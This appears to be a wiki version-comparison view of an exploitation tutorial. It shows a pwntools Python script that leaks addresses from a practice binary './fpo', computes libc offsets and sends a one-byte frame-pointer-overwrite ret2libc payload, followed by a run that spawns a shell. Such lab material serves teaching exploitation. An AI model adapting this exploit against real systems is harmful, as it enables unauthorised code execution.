Versions Compared

Old Version 6

changes.mady.by.user Lazenca.0x0

Saved on

compared with

New Version Current

changes.mady.by.user Lazenca.0x0

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

Code Block
languagepy
titleExploitexploit.py
from pwn import *

p = process(['./fpo','AAAA'])

p.recvuntil('buf[50] address : ')
tmp = p.recv(10)
stackAddr = int(tmp,16)
stackAddr += 0x8
onebyte = int(tmp[8:11],16)
onebyte += 0x4

p.recvuntil('Printf() address : ')
libc = p.recvuntil('\n')
libc = int(libc,16)

libcBase = libc - 0x49020
sysAddr = libcBase + 0x3a940
exit = libcBase + 0x2e7b0
binsh = libcBase + 0x15902b

print "StackAddr : " + hex(stackAddr)
print "onebyte : " + hex(onebyte)
print "libc base : " + hex(libcBase)
print "system() : " +hex(sysAddr)
print "exit() : " +hex(exit)
print "binsh : " + hex(binsh)

exploit = p32(stackAddr)
exploit += p32(sysAddr)
exploit += p32(exit)
exploit += p32(binsh)
exploit += '\x90' * (62 - len(exploit))
exploit += p32(onebyte)

p.send(exploit)
p.interactive()
Code Block
titlepython Exploit.py
lazenca0x0@ubuntu:~/Exploit/FPO$ python Exploitexploit.py 
[+] Starting local process './fpo': pid 4830
StackAddr : 0xffc98542
onebyte : 0x3e
libc base : 0xf7d8d000
system() : 0xf7dc7940
exit() : 0xf7dbb7b0
binsh : 0xf7ee602b
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$

...